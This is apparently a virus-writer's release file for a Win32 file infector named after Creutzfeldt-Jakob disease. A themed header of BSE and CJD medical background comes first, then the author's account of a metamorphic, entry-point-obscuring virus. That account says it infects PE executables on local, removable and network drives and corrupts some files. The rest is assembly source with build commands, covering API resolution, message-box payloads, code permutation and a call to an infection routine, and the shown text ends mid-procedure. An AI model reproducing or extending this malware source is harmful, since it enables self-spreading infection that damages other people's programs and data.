; ; ; CREUTZFELDT-JAKOB DISEASE BioCoded by Neurobasher/Germany ; --------------------------------------------------------- ; ; ; ; ; Index: ; ------ ; ; 1 - About the biological version ; 2 - Author's description ; 3 - [WIN32.CJD] source code ; ; ; ; ; 1 - About the biological version ; -------------------------------- ; ; ;--------------------------------------- ;What is Bovine Spongiform Encephalopaty ;--------------------------------------- ; ;BSE is a progressive, fatal neurologic disorder of cattle and is classified as one of the transmissible ;spongiform encephalopathies, a group of diseases of animals and humans believed to be caused by abnormally ;folded proteins called prions. The disease itself is known since 1920 and is often called the 'mad cow disease'. ;BSE was first identified in 1986 in the United Kingdom (UK), where it caused a large outbreak ;among cattle. Although the source of the BSE epizootic agent is uncertain, feeding cattle BSE-contaminated ;meat-and-bone meal is the major contributory factor to the amplification of BSE among cattle. Since 1986, ;BSE cases have been identified in 20 European countries, Japan, Israel, and Canada. ; ;The appearance of the new variant of CJD in several younger than average people in Great Britain and France ;has led to concern that BSE may be transmitted to humans through consumption of contaminated beef. Although ;laboratory tests have shown a strong similarity between the prions causing BSE and CJD, there is no direct ;proof to support this theory. ; ;---------------------------------- ;What is Creutzfeldt-Jakob Disease? ;---------------------------------- ; ;Creutzfeldt-Jakob disease (CJD) is a rare, degenerative, invariably fatal brain disorder. ;Typically, onset of symptoms occurs at about age 60.. There are three major categories of CJD: ;sporadic CJD, hereditary CJD, and acquired CJD. There is currently no single diagnostic test for CJD. ;The first concern is to rule out treatable forms of dementia such as encephalitis or chronic meningitis. ;The only way to confirm a diagnosis of CJD is by brain biopsy or autopsy. In a brain biopsy, ;a neurosurgeon removes a small piece of tissue from the patient's brain so that is can be examined ;by a neurologist. Because a correct diagnosis of CJD does not help the patient, a brain biopsy ;is discouraged unless it is need to rule out a treatable disorder. While CJD can be transmitted to ;other people, the risk of this happening is extremely small. ; ;There is no treatment that can cure or control CJD. Current treatment is aimed at alleviating symptoms ;and making the patient as comfortable as possible. Opiate drugs can help relieve pain, and the drugs ;clonazepam and sodium valproate may help relieve involuntary muscle jerks. ; ;About 90 percent of patients die within 1 year. In the early stages of disease, patients may have ;failing memory, behavioral changes, lack of coordination and visual disturbances. As the illness progresses, ;mental deterioration becomes pronounced and involuntary movements, blindness, weakness of extremities, ;and coma may occur. ; ;The leading scientific theory at this time maintains that CJD is caused by a type of protein called a prion. ;The harmless and the infectious forms of the prion protein are nearly identical, but the infectious form ;takes a different folded shape than the normal protein. Researchers are examining whether the transmissible ;agent is, in fact, a prion and trying to discover factors that influence prion infectivity and how the disorder ;damages the brain. Using rodent models of the disease and brain tissue from autopsies, they are also trying to ;identify factors that influence the susceptibility to the disease and that govern when in life the disease appears. ; ; ; ; 2 - Authors description ; ----------------------- ; ;It is a very complex parasitic highly polymorphic Win32 virus that uses the entry-point ;obscuring technique. ;The virus uses a metamorphic engine and permutates its code. ;The virus infects Windows executable files (Win32 PE EXE). When run ;the virus searches for these files and randomly infects them by different infection sheme. ;The virus searches for Win32 PE executable files in the current and five levels upper ;directories, also on the available network and removable media and in the directories if ;their names not begin with "W", and infects them. The virus doesn't infect files if their ;names begin with several suspicious caracters like anti*,... ; ;or if the name contains the 'V' letter, and depending on the random counter value. ;While infecting files the virus rebuilds and encrypts its body and writes it to one of the ;host file's sections. Then, it searches for and replaces one of the calls to the ;"ExitProcess" function in the host's code section with the call to the viral code. ;Several functions depends on randomness and are mutated from generation to generation also. ; ;Payload ;Depending on the system date the virus displays various messages ;There's a really small chance the virus allows multipe infections of the files. ;This files were corrupted and won't work anymore. ; ; ; 3 - Win32 source code ; --------------------- ; bugfixed vers. ; ; To get first generation file use TASM 5.0r ; c:\tasm32 -ml -m9 -q cjdiseae.asm ; c:\tlink32 -Tpe -c -x -aa -r cjdisease.obj,,,import32 ; .386p .model flat locals .code ret .data AddressToFree dd 0 extrn ExitProcess:PROC extrn VirtualAlloc:PROC extrn VirtualFree:PROC extrn GetModuleHandleA:PROC extrn GetProcAddress:PROC extrn MessageBoxA:PROC PreMain proc push 4 push 1000h push 350000h push 0 call VirtualAlloc or eax, eax jz @@Error mov ebp, eax mov [AddressToFree], eax mov ebx, eax mov esi, offset Main mov edi, eax mov ecx, offset EndOfCode sub ecx, offset Main rep movsb ; Copy virus push __DISASM2_SECTION push __DATA_SECTION push __BUFFERS_SECTION push __DISASM_SECTION push __CODE_SECTION mov eax, offset GetProcAddress mov eax, [eax+2] push eax mov eax, offset GetModuleHandleA mov eax, [eax+2] push eax push 5*2 ; Bit 0=0: 'A', 1 call ebx push 0C000h push 0 push dword ptr [AddressToFree] call VirtualFree @@Error: push 0 jmp @@Dropper title: db ' [Win32.CJD] was done by <<>> ',0 body: db ' Creutzfeldt-Jakob Disease ',0ah,0dh db ' rare, degenerative, invariably fatal brain disorder. ',0ah,0dh db ' ------------- ',0ah,0dh db ' [BSE] Bovine Spongiform Encephalopaty ',0ah,0dh db ' well known as mad-cow-disease ',0ah,0dh db ' ',0ah,0dh db ' f i r s t g e n e r a t i o n e x e c u t e d . . . ',0 @@Dropper: push 0h push offset title push offset body push 0h call MessageBoxA push 0h call ExitProcess PreMain endp __CODE_SECTION EQU 000000h __DISASM_SECTION EQU 100000h __BUFFERS_SECTION EQU 080000h __LABEL_SECTION EQU __BUFFERS_SECTION + 00000h __VARIABLE_SECTION EQU __BUFFERS_SECTION + 10000h __BUFFER1_SECTION EQU __BUFFERS_SECTION + 20000h __BUFFER2_SECTION EQU __BUFFERS_SECTION + 30000h __VAR_MARKS_SECTION EQU __BUFFERS_SECTION + 40000h __DATA_SECTION EQU 0E0000h __DISASM2_SECTION EQU 200000h NumberOfLabels EQU __DATA_SECTION + 0000h NumberOfInstructions EQU __DATA_SECTION + 0008h InstructionTable EQU __DATA_SECTION + 0010h LabelTable EQU __DATA_SECTION + 0018h FutureLabelTable EQU __DATA_SECTION + 0020h PathMarksTable EQU __DATA_SECTION + 0028h NumberOfLabelsPost EQU __DATA_SECTION + 0030h AddressOfLastInstruction EQU __DATA_SECTION + 0038h VariableTable EQU __DATA_SECTION + 0040h NumberOfVariables EQU __DATA_SECTION + 0048h FramesTable EQU __DATA_SECTION + 0050h PermutationResult EQU __DATA_SECTION + 0058h JumpsTable EQU __DATA_SECTION + 0060h AddressOfLastFrame EQU __DATA_SECTION + 0068h PositionOfFirstInstruction EQU __DATA_SECTION + 0070h MODValue EQU __DATA_SECTION + 0078h NumberOfJumps EQU __DATA_SECTION + 0080h RndSeed1 EQU __DATA_SECTION + 0088h RndSeed2 EQU __DATA_SECTION + 0090h ExpansionResult EQU __DATA_SECTION + 0098h Register8Bits EQU __DATA_SECTION + 00A0h Xp_Register0 EQU __DATA_SECTION + 00A8h Xp_Register1 EQU __DATA_SECTION + 00B0h Xp_Register2 EQU __DATA_SECTION + 00B8h Xp_Register3 EQU __DATA_SECTION + 00C0h Xp_Register4 EQU __DATA_SECTION + 00C8h Xp_Register5 EQU __DATA_SECTION + 00D0h Xp_Register6 EQU __DATA_SECTION + 00D8h Xp_Register7 EQU __DATA_SECTION + 00E0h DeltaRegister EQU __DATA_SECTION + 00E8h Xp_8Bits EQU __DATA_SECTION + 00F0h Xp_Operation EQU __DATA_SECTION + 00F8h Xp_Register EQU __DATA_SECTION + 0100h Xp_Mem_Index1 EQU __DATA_SECTION + 0108h Xp_Mem_Index2 EQU __DATA_SECTION + 0110h Xp_Mem_Addition EQU __DATA_SECTION + 0118h Xp_Immediate EQU __DATA_SECTION + 0120h Xp_SrcRegister EQU __DATA_SECTION + 0128h Xp_FlagRegOrMem EQU __DATA_SECTION + 0130h Xp_RecurseLevel EQU __DATA_SECTION + 0138h Xp_LEAAdditionFlag EQU __DATA_SECTION + 0140h VarMarksTable EQU __DATA_SECTION + 0148h _BUFFERS_SECTION EQU __DATA_SECTION + 0150h _CODE_SECTION EQU __DATA_SECTION + 0158h _DISASM_SECTION EQU __DATA_SECTION + 0160h _LABEL_SECTION EQU __DATA_SECTION + 0168h _VARIABLE_SECTION EQU __DATA_SECTION + 0170h _BUFFER1_SECTION EQU __DATA_SECTION + 0178h _BUFFER2_SECTION EQU __DATA_SECTION + 0180h _VAR_MARKS_SECTION EQU __DATA_SECTION + 0188h _DATA_SECTION EQU __DATA_SECTION + 0190h _DISASM2_SECTION EQU __DATA_SECTION + 0198h New_CODE_SECTION EQU __DATA_SECTION + 01A0h New_DISASM_SECTION EQU __DATA_SECTION + 01A8h New_BUFFERS_SECTION EQU __DATA_SECTION + 01B0h ; New_LABEL_SECTION EQU __DATA_SECTION + 01B0h ; New_VARIABLE_SECTION EQU __DATA_SECTION + 01B8h ; New_BUFFER1_SECTION EQU __DATA_SECTION + 01C0h ; New_BUFFER2_SECTION EQU __DATA_SECTION + 01C8h ; New_VAR_MARKS_SECTION EQU __DATA_SECTION + 01D0h New_DATA_SECTION EQU __DATA_SECTION + 01D8h New_DISASM2_SECTION EQU __DATA_SECTION + 01E0h RVA_GetModuleHandle EQU __DATA_SECTION + 01E8h RVA_GetProcAddress EQU __DATA_SECTION + 01F0h FlagAorW EQU __DATA_SECTION + 01F8h ReturnValue EQU __DATA_SECTION + 0200h hKernel EQU __DATA_SECTION + 0208h hUser32 EQU __DATA_SECTION + 0210h RVA_CreateFileA EQU __DATA_SECTION + 0218h RVA_CreateFileMappingA EQU __DATA_SECTION + 0220h RVA_MapViewOfFile EQU __DATA_SECTION + 0228h RVA_UnmapViewOfFile EQU __DATA_SECTION + 0230h RVA_GetFileSize EQU __DATA_SECTION + 0238h RVA_GetFileAttributesA EQU __DATA_SECTION + 0240h RVA_SetFileAttributesA EQU __DATA_SECTION + 0248h RVA_SetFilePointer EQU __DATA_SECTION + 0250h RVA_SetFileTime EQU __DATA_SECTION + 0258h RVA_SetEndOfFile EQU __DATA_SECTION + 0260h RVA_FindFirstFileA EQU __DATA_SECTION + 0268h RVA_FindNextFileA EQU __DATA_SECTION + 0270h RVA_FindClose EQU __DATA_SECTION + 0278h RVA_CloseHandle EQU __DATA_SECTION + 0280h RVA_MessageBoxA EQU __DATA_SECTION + 0288h NewLabelTable EQU __DATA_SECTION + 0290h Asm_ByteToSort EQU __DATA_SECTION + 0298h JumpRelocationTable EQU __DATA_SECTION + 02A0h NumberOfJumpRelocations EQU __DATA_SECTION + 02A8h Permut_LastInstruction EQU __DATA_SECTION + 02B0h TranslatedDeltaRegister EQU __DATA_SECTION + 02B8h hFile EQU __DATA_SECTION + 02C0h FileSize EQU __DATA_SECTION + 02C8h OriginalFileSize EQU __DATA_SECTION + 02D0h hMapping EQU __DATA_SECTION + 02D8h MappingAddress EQU __DATA_SECTION + 02E0h HeaderAddress EQU __DATA_SECTION + 02E8h StartOfSectionHeaders EQU __DATA_SECTION + 02F0h RelocHeader EQU __DATA_SECTION + 02F8h TextHeader EQU __DATA_SECTION + 0300h DataHeader EQU __DATA_SECTION + 0308h RVA_TextHole EQU __DATA_SECTION + 0310h Phys_TextHole EQU __DATA_SECTION + 0318h TextHoleSize EQU __DATA_SECTION + 0320h RVA_DataHole EQU __DATA_SECTION + 0328h Phys_DataHole EQU __DATA_SECTION + 0330h MakingFirstHole EQU __DATA_SECTION + 0338h ExitProcessAddress EQU __DATA_SECTION + 0340h GetModuleHandleAddress EQU __DATA_SECTION + 0348h GetProcAddressAddress EQU __DATA_SECTION + 0350h VirtualAllocAddress EQU __DATA_SECTION + 0358h GetModuleHandleMode EQU __DATA_SECTION + 0360h VirtualPositionOfVar EQU __DATA_SECTION + 0368h PhysicalPositionOfVar EQU __DATA_SECTION + 0370h Kernel32Imports EQU __DATA_SECTION + 0378h hFindFile EQU __DATA_SECTION + 0380h Addr_FilePath EQU __DATA_SECTION + 0388h FileAttributes EQU __DATA_SECTION + 0390h SizeOfNewCode EQU __DATA_SECTION + 0398h FindFileData EQU __DATA_SECTION + 03A0h OtherBuffers EQU __DATA_SECTION + 03A8h RoundedSizeOfNewCode EQU __DATA_SECTION + 03B0h NewAssembledCode EQU __DATA_SECTION + 03B8h NumberOfUndoActions EQU __DATA_SECTION + 03C0h LastHeader EQU __DATA_SECTION + 03C8h MaxSizeOfDecryptor EQU __DATA_SECTION + 03D0h CreatingADecryptor EQU __DATA_SECTION + 03D8h DecryptorPseudoCode EQU __DATA_SECTION + 03E0h AssembledDecryptor EQU __DATA_SECTION + 03E8h Decryptor_DATA_SECTION EQU __DATA_SECTION + 03F0h SizeOfExpansion EQU __DATA_SECTION + 03F8h SizeOfDecryptor EQU __DATA_SECTION + 0400h TypeOfEncryption EQU __DATA_SECTION + 0408h EncryptionKey EQU __DATA_SECTION + 0410h IndexValue EQU __DATA_SECTION + 0418h IndexRegister EQU __DATA_SECTION + 0420h BufferRegister EQU __DATA_SECTION + 0428h CounterRegister EQU __DATA_SECTION + 0430h BufferValue EQU __DATA_SECTION + 0438h CounterValue EQU __DATA_SECTION + 0440h Poly_FirstPartOfFunction EQU __DATA_SECTION + 0448h Poly_SecondPartOfFunction EQU __DATA_SECTION + 0450h Poly_ThirdPartOfFunction EQU __DATA_SECTION + 0458h AdditionToBuffer EQU __DATA_SECTION + 0460h Poly_Jump_ErrorInVirtualAlloc EQU __DATA_SECTION+0468h ;Index2Register EQU __DATA_SECTION + 0470h Poly_LoopLabel EQU __DATA_SECTION + 0478h RVA_GetSystemTime EQU __DATA_SECTION + 0480h RVA_GetTickCount EQU __DATA_SECTION + 0488h RVA_GetDriveTypeA EQU __DATA_SECTION + 0490h RVA_GetLogicalDriveStringsA EQU __DATA_SECTION + 0498h RVA_SetCurrentDirectoryA EQU __DATA_SECTION + 04A0h StartOfEncryptedData EQU __DATA_SECTION + 04A8h SizeOfNewCodeP2 EQU __DATA_SECTION + 04B0h Poly_InitialValue EQU __DATA_SECTION + 04B8h Poly_Addition EQU __DATA_SECTION + 04C0h Poly_ExcessJumpInstruction EQU __DATA_SECTION + 04C8h DirectoryDeepness EQU __DATA_SECTION + 04D0h RVA_GetSystemDefaultLCID EQU __DATA_SECTION + 04D8h Poly_JumpRandomExecution EQU __DATA_SECTION + 04E0h Main proc ; EBP = Delta offset pop ebx pop eax mov ecx, eax and eax, 1 mov [ebp+FlagAorW], eax and ecx, 0FFFFFFFEh shr ecx, 1 mov [ebp+DeltaRegister], ecx pop eax mov eax, [eax] mov [ebp+RVA_GetModuleHandle], eax pop eax mov eax, [eax] mov [ebp+RVA_GetProcAddress], eax pop eax and eax, 03FFFFFh mov [ebp+_CODE_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_DISASM_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_BUFFERS_SECTION], eax mov [ebp+_LABEL_SECTION], eax add eax, 10000h mov [ebp+_VARIABLE_SECTION], eax add eax, 10000h mov [ebp+_BUFFER1_SECTION], eax add eax, 10000h mov [ebp+_BUFFER2_SECTION], eax add eax, 10000h mov [ebp+_VAR_MARKS_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_DATA_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_DISASM2_SECTION], eax push ebx ; Restore return value mov edx, [ebp+_BUFFER1_SECTION] add edx, ebp push eax push ecx push edx ; APICALL_BEGIN mov eax, 'nrek' mov [edx], eax mov eax, '23le' mov [edx+4], eax mov eax, 'lld.' mov [edx+8], eax xor eax, eax mov [edx+0Ch], eax call APICall_GetModuleHandle pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error mov [ebp+hKernel], eax push eax push ecx push edx mov eax, 'resu' mov [edx], eax mov eax, 'd.23' mov [edx+4], eax mov eax, 'll' mov [edx+8], eax call APICall_GetModuleHandle pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] mov [ebp+hUser32], eax mov edx, [ebp+_BUFFER1_SECTION] add edx, ebp mov edi, [ebp+hKernel] mov eax, 'aerC' mov [edx], eax mov eax, 'iFet' mov [edx+4], eax mov eax, 'Ael' mov [edx+8], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_CreateFileA], eax mov eax, 'ppaM' mov [edx+0Ah], eax mov eax, 'Agni' mov [edx+0Eh], eax xor eax, eax mov [edx+12h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_CreateFileMappingA], eax add edx, 2 mov eax, 'VpaM' mov [edx], eax mov eax, 'Owei' mov [edx+4], eax mov eax, 'liFf' mov [edx+8], eax mov eax, 'e' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_MapViewOfFile], eax sub edx, 2 mov eax, 'amnU' mov [edx], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_UnmapViewOfFile], eax mov eax, 'SteG' mov [edx], eax mov eax, 'etsy' mov [edx+4], eax mov eax, 'miTm' mov [edx+8], eax mov eax, 'e' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetSystemTime], eax mov eax, 'virD' mov [edx+3], eax mov eax, 'pyTe' mov [edx+7], eax mov eax, 'Ae' mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetDriveTypeA], eax mov eax, 'igoL' mov [edx+3], eax mov eax, 'Dlac' mov [edx+7], eax mov eax, 'evir' mov [edx+0Bh], eax mov eax, 'irtS' mov [edx+0Fh], eax mov eax, 'Asgn' mov [edx+13h], eax xor eax, eax mov [edx+17h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetLogicalDriveStringsA], eax mov eax, 'tsyS' mov [edx+3], eax mov eax, 'eDme' mov [edx+7], eax mov eax, 'luaf' mov [edx+0Bh], eax mov eax, 'ICLt' mov [edx+0Fh], eax mov eax, 'D' mov [edx+13h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetSystemDefaultLCID], eax mov eax, 'CteS' mov [edx], eax mov eax, 'erru' mov [edx+4], eax mov eax, 'iDtn' mov [edx+8], eax mov eax, 'tcer' mov [edx+0Ch], eax mov eax, 'Ayro' mov [edx+10h], eax xor eax, eax mov [edx+14h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetCurrentDirectoryA], eax mov eax, 'FteG' mov [edx], eax mov eax, 'Seli' mov [edx+4], eax mov eax, 'ezi' mov [edx+8], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetFileSize], eax mov eax, 'rttA' mov [edx+7], eax mov eax, 'tubi' mov [edx+0Bh], eax mov eax, 'Ase' mov [edx+0Fh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetFileAttributesA], eax mov eax, 'FteS' mov [edx], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetFileAttributesA], eax mov eax, 'nioP' mov [edx+7], eax mov eax, 'ret' mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetFilePointer], eax mov eax, 'emiT' mov [edx+7], eax xor eax, eax mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetFileTime], eax mov eax, 'OdnE' mov [edx+3], eax mov eax, 'liFf' mov [edx+7], eax mov eax, 'e' mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetEndOfFile], eax mov eax, 'dniF' mov [edx], eax mov eax, 'sriF' mov [edx+4], eax mov eax, 'liFt' mov [edx+8], eax mov eax, 'Ae' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_FindFirstFileA], eax mov eax, 'txeN' mov [edx+4], eax mov eax, 'eliF' mov [edx+8], eax mov eax, 'A' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_FindNextFileA], eax mov eax, 'solC' mov [edx+4], eax mov eax, 'e' mov [edx+8], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_FindClose], eax add edx, 4 mov eax, 'dnaH' mov [edx+5], eax mov eax, 'el' mov [edx+9], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_CloseHandle], eax sub edx, 4 mov edi, [ebp+hUser32] mov eax, 'sseM' mov [edx], eax mov eax, 'Bega' mov [edx+4], eax mov eax, 'Axo' mov [edx+8], eax call GetFunction mov [ebp+RVA_MessageBoxA], eax push eax push ecx push edx mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp push eax call dword ptr [ebp+RVA_GetSystemTime] pop edx pop ecx pop eax mov ebx, [ebp+_BUFFER1_SECTION] add ebx, ebp mov eax, [ebx+04h] add eax, [ebx+0Ch] mov [ebp+RndSeed1], eax add eax, [ebx+08h] mov [ebp+RndSeed2], eax mov eax, [ebp+RVA_MessageBoxA] or eax, eax jz @@NoPayload ;; Simple, silly MessageBox with a partly metamorphic message :) mov edx, [ebp+_BUFFER1_SECTION] add edx, ebp mov eax, [edx+2] and eax, 0FFh @@ChoosePayload: call Random and eax, 3 cmp eax, 1 je @@CheckPayload cmp eax, 2 je @@CheckPayload2 cmp eax, 3 je @@CheckPayload3 cmp eax, 0 je @@EndPayload @@CheckPayload: call Random and eax, 03Fh jnz @@EndPayload push edx call Random and eax, 00000000h add eax, 'DJC[' ;; "[CJD" mov [edx], eax add edx, 4 call Random and eax, 20200000h add eax, 'RC ]' ;; "] CR" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'ZTUE' ;; "EUTZ" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'DLEF' ;; "FELD" mov [edx], eax add edx, 4 call Random and eax, 20200020h add eax, 'AJ-T' ;; "T-JA" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' BOK' ;; "KOB " mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'ESID' ;; "DISE" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' ESA' ;; "ASE " mov [edx], eax call Random and eax, 2 jnz @@TruncatePayload add edx, 4 call Random and eax, 00000000h add eax, ' )c(' ;; " (c)" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'N yb' ;; "by N" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'orue' ;; "euro" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'hsab' ;; "bash" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'G/re' ;; "er/G" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'amre' ;; "erma" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, ' yn' ;; "ny " mov [edx], eax @@TruncatePayload: pop edx ; "[CJD] Creutzfeldt-Jakob Disease" ; and sometimes "by Neurobasher/Germany" push eax ; first part with random upcases and lowcases. push ecx push edx xor eax, eax push eax mov eax, edx push eax push eax xor eax, eax push eax call dword ptr [ebp+RVA_MessageBoxA] pop edx pop ecx pop eax jmp @@EndPayload @@CheckPayload2: call Random and eax, 1FFh jnz @@CheckPayload3 push edx xor eax, eax call Random and eax, 20202020h add eax, 'IVOB' ;; "BOVI" mov [edx], eax add edx, 4 call Random and eax, 20002020h add eax, 'S EN' ;; "NE S" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'GNOP' ;; "PONG" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'ROFI' ;; "IFOR" mov [edx], eax add edx, 4 call Random and eax, 20002020h add eax, 'NE M' ;; "M EN" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'HPEC' ;; "CEPH" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'POLA' ;; "ALOP" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' YTA' ;; "ATY " mov [edx], eax pop edx push eax push ecx push edx xor eax, eax push eax mov eax, edx push eax push eax xor eax, eax push eax call dword ptr [ebp+RVA_MessageBoxA] pop edx pop ecx pop eax @@CheckPayload3: call Random and eax, 1FFh jnz @@EndPayload push edx xor eax, eax call Random and eax, 00202020h add eax, ' DAM' ;; "MAD " mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' WOC' ;; "COW " mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'ESID' ;; "DISE" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' ESA' ;; "ASE " mov [edx], eax pop edx push eax push ecx push edx xor eax, eax push eax mov eax, edx push eax push eax xor eax, eax push eax call dword ptr [ebp+RVA_MessageBoxA] pop edx pop ecx pop eax @@EndPayload: @@NoPayload: mov esi, [ebp+_DISASM_SECTION] add esi, ebp xor eax, eax push esi @@LoopGarbleSect_01: mov ebx, eax add eax, 1 mov ecx, eax add eax, 1 mov edx, eax add eax, 1 push eax call Xp_GarbleRegisters pop eax mov [esi], ebx mov [esi+4], ecx mov [esi+8], edx add esi, 0Ch cmp eax, 6 jnz @@LoopGarbleSect_01 pop esi push esi mov ecx, 2 @@LoopGarbleSect_02: push ecx mov ebx, [esi] mov ecx, [esi+08h] mov edx, [esi+10h] call Xp_GarbleRegisters mov [esi], ebx mov [esi+08h], ecx mov [esi+10h], edx pop ecx add esi, 4 sub ecx, 1 or ecx, ecx jnz @@LoopGarbleSect_02 pop esi mov ecx, 6 xor edx, edx @@LoopGarbleSect_03: call Random and eax, 7FFFh add edx, eax mov eax, [esi] or eax, eax jz @@GarbleSect_CodeSection cmp eax, 1 jz @@GarbleSect_DisasmSection cmp eax, 2 jz @@GarbleSect_BuffersSection cmp eax, 3 jz @@GarbleSect_DataSection cmp eax, 4 jnz @@GarbleSect_Next @@GarbleSect_Disasm2Section: mov [ebp+New_DISASM2_SECTION], edx add edx, 100000h jmp @@GarbleSect_Next @@GarbleSect_CodeSection: mov [ebp+New_CODE_SECTION], edx add edx, 80000h jmp @@GarbleSect_Next @@GarbleSect_DisasmSection: mov [ebp+New_DISASM_SECTION], edx add edx, 100000h jmp @@GarbleSect_Next @@GarbleSect_BuffersSection: mov [ebp+New_BUFFERS_SECTION], edx add edx, 60000h jmp @@GarbleSect_Next @@GarbleSect_DataSection: mov [ebp+New_DATA_SECTION], edx add edx, 20000h @@GarbleSect_Next: add esi, 4 sub ecx, 1 or ecx, ecx jnz @@LoopGarbleSect_03 mov eax, [ebp+_DISASM_SECTION] add eax, ebp mov [ebp+InstructionTable], eax mov eax, [ebp+_LABEL_SECTION] add eax, ebp mov [ebp+LabelTable], eax mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+FutureLabelTable], eax mov eax, [ebp+_DISASM2_SECTION] add eax, ebp mov [ebp+PathMarksTable], eax mov esi, [ebp+_CODE_SECTION] add esi, ebp call DisasmCode nop mov [ebp+AddressOfLastInstruction], edi call ShrinkCode mov eax, [ebp+_VARIABLE_SECTION] add eax, ebp mov [ebp+VariableTable], eax mov eax, [ebp+_VAR_MARKS_SECTION] add eax, ebp mov [ebp+VarMarksTable], eax mov ecx, [ebp+DeltaRegister] call IdentifyVariables mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+FramesTable], eax mov eax, [ebp+_DISASM2_SECTION] add eax, ebp mov [ebp+PermutationResult], eax mov eax, [ebp+_BUFFER2_SECTION] add eax, ebp mov [ebp+JumpsTable], eax call PermutateCode mov eax, [ebp+PermutationResult] mov [ebp+InstructionTable], eax xor eax, eax mov [ebp+CreatingADecryptor], eax mov eax, [ebp+_DISASM_SECTION] add eax, ebp mov [ebp+ExpansionResult], eax xor eax, eax mov [ebp+SizeOfExpansion], eax call XpandCode mov eax, [ebp+ExpansionResult] mov [ebp+InstructionTable], eax mov eax, [ebp+_DISASM2_SECTION] add eax, ebp mov [ebp+NewAssembledCode], eax mov eax, [ebp+_VARIABLE_SECTION] add eax, ebp mov [ebp+NewLabelTable], eax mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+JumpRelocationTable], eax call AssembleCode mov eax, [ebp+_DISASM_SECTION] add eax, ebp mov [ebp+DecryptorPseudoCode], eax add eax, 80000h mov [ebp+AssembledDecryptor], eax mov eax, [ebp+_BUFFER2_SECTION] add eax, ebp mov [ebp+FindFileData], eax mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+OtherBuffers], eax call InfectFiles @@Error: ret Main endp ;---------------------------------------------------------------------------------------- IdentifyVariables proc mov esi, [ebp+InstructionTable] mov edi, [ebp+VariableTable] xor eax, eax mov [ebp+NumberOfVariables], eax @@LoopGetVar: xor eax, eax mov al, [esi] cmp eax, 0FCh jz @@NextInstruction call CheckIfInstructionUsesMem or eax, eax jz @@NextInstruction mov al, [esi+1] cmp eax, ecx jz @@DeltaOffsetAt1 mov al, [esi+2] cmp eax, ecx jz @@DeltaOffsetAt2 @@NextInstruction: add esi, 10h cmp esi, [ebp+AddressOfLastInstruction] jnz @@LoopGetVar jmp @@SelectNewVariables @@DeltaOffsetAt1: mov al, [esi+2] jmp @@Continue_01 @@DeltaOffsetAt2: mov al, [esi+1] @@Continue_01: cmp eax, 8 jnz @@NextInstruction mov eax, [esi+3] mov edx, [ebp+VariableTable] mov ebx, [ebp+NumberOfVariables] sub eax, [ebp+_DATA_SECTION] and eax, 0FFFFFFF8h @@LookForVariable: or ebx, ebx jz @@InsertVariable cmp eax, [edx] jz @@VariableExists add edx, 4 sub ebx, 4 jmp @@LookForVariable @@InsertVariable: mov [edx], eax mov eax, [ebp+NumberOfVariables] add eax, 4 mov [ebp+NumberOfVariables], eax @@VariableExists: mov eax, 00000809h mov [esi+1], eax mov [esi+3], edx jmp @@NextInstruction @@SelectNewVariables: mov ecx, 20000h / 4 mov edi, [ebp+VarMarksTable] xor eax, eax @@LoopInitializeMarks: mov [edi], eax add edi, 4 sub ecx, 1 or ecx, ecx jnz @@LoopInitializeMarks mov ecx, [ebp+NumberOfVariables] mov ebx, [ebp+VariableTable] @@LoopGetNewVar: call Random and eax, 01FFF8h add eax, [ebp+VarMarksTable] mov edx, [eax] or edx, edx jnz @@LoopGetNewVar mov edx, 1 mov [eax], edx sub eax, [ebp+VarMarksTable] push ebx mov ebx, eax call Random and eax, 3 add eax, ebx 